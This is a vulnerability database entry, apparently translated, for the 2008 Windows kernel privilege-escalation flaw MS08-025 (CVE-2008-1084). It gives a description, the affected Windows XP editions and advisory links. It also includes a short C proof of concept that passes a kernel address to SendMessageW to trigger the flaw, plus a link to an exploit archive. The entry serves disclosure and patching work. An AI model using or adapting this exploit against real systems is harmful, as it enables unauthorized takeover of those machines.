Microsoft Windows Kernel User-Mode Callback Local Privilege Escalation Vulnerability (MS08-025)

Vulnerability ID: 1114958
Vulnerability type: Code injection
Published: 2008-04-08
Updated: 2008-10-14
CVE ID: CVE-2008-1084
CNNVD-ID: CNNVD-200804-105
Platform: Windows
CVSS score: 7.2
|Vulnerability sources
https://www.exploit-db.com/exploits/31585
https://www.securityfocus.com/bid/28554
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200804-105
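|Vulnerability details
Microsoft Windows is a very popular operating system released by Microsoft. A vulnerability exists in the way the Windows kernel processes data passed in by users, and a local attacker may exploit it to elevate privileges. The Windows kernel does not properly validate input passed from user mode to the kernel, which allows an attacker to run code with elevated privileges. An attacker who successfully exploits this vulnerability can execute arbitrary code and take complete control of the affected system. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
|Exploit (EXP)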
/*
source: http://www.securityfocus.com/bid/28554/info

Microsoft Windows is prone to a local privilege-escalation vulnerability.

The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
*/


#include <stdio.h>
#include <windows.h>

int main(int argc,char *argv[])
{
    DWORD    dwHookAddress = 0x80000000;

    printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );
    printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" );

    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
    return 0;
}
|Affected products
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional x64 Edition SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft
|References

Source: BID
Name: 28554
Link: http://www.securityfocus.com/bid/28554
Source: SECTRACK
Name: 1019803
Link: http://www.securitytracker.com/id?1019803
Source: MILW0RM
Name: 5518
Link: http://www.milw0rm.com/exploits/5518
Source: MS
Name: MS08-025
Link: http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx
Source: VUPEN
Name: ADV-2008-1149
Link: http://www.frsirt.com/english/advisories/2008/1149/references
Source: SECUNIA
Name: 29720
Link: http://secunia.com/advisories/29720
Source: OVAL
Name: oval:org.mitre.oval:def:5437
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5437
Source: MISC
Link: http://milw0rm.com/sploits/2008-ms08-25-exploit.zip
Source: HP
Name: HPSBST02329
Link: http://marc.info/?l=bugtraq&m=120845064910729&w=2